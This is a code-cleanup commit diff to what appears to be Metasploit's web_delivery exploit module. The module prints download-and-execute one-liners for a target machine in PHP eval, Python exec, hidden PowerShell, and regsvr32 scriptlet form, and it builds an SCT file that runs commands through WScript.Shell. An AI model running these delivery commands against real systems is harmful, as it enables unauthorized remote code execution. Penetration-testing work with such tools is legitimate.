Code clean up (URLs, ordering and printing)

Author: g0tmi1k

modules/exploits/multi/script/web_delivery.rb

@@ -47,11 +47,11 @@ def initialize(info = {})
         },
       'References'     =>
         [
-          ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
           ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
-          ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
+          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+          ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
         ],
       'Platform'       => %w(python php win),
       'Targets'        =>
@@ -84,39 +84,43 @@ def initialize(info = {})
   )
   end
 
+
+  def primer
+    url = get_uri
+    print_status("Run the following command on the target machine:")
+    case target.name
+    when 'PHP'
+      print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));"))
+    when 'Python'
+      print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());"))
+    when 'PSH'
+      print_line(gen_psh(url))
+    when 'Regsvr32'
+      print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    end
+  end
+
+
   def on_request_uri(cli, _request)
     if _request.raw_uri =~ /\.sct$/
-      print_status("Handling .sct Request")
       psh = gen_psh(get_uri)
       data = gen_sct_file(psh)
-      send_response(cli, data, 'Content-Type' => 'text/plain')
     elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
-      print_status("Delivering Payload")
       data = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
                              remove_comspec: true,
                              exec_in_place: true
                            )
     else
-      print_status("Delivering Payload")
       data = %Q(#{payload.encoded})
     end
-    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
-  end
 
-  def primer
-    url = get_uri
-    print_status('Run the following command on the target machine:')
-    case target.name
-    when 'PHP'
-      print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
-    when 'Python'
-      print_line('Python:')
-      print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
-    when 'PSH'
-      print_line gen_psh(url)
-    when 'Regsvr32'
-      print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    if _request.raw_uri =~ /\.sct$/
+      print_status("Handling .sct Request")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+    else
+      print_status("Delivering Payload")
+      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
     end
   end
 
@@ -125,13 +129,10 @@ def gen_psh(url)
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
       download_and_run = "#{ignore_cert}#{download_string}"
-      print_line generate_psh_command_line(
-      return generate_psh_command_line(
-                                             noprofile: true,
-                                             windowstyle: 'hidden',
-                                             command: download_and_run
-                                           )
-    end
+      return generate_psh_command_line(noprofile: true,
+                                       windowstyle: 'hidden',
+                                       command: download_and_run
+                                     )
   end
 
 
@@ -143,4 +144,4 @@ def rand_class_id
   def gen_sct_file(command)
     %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
   end
-end
+end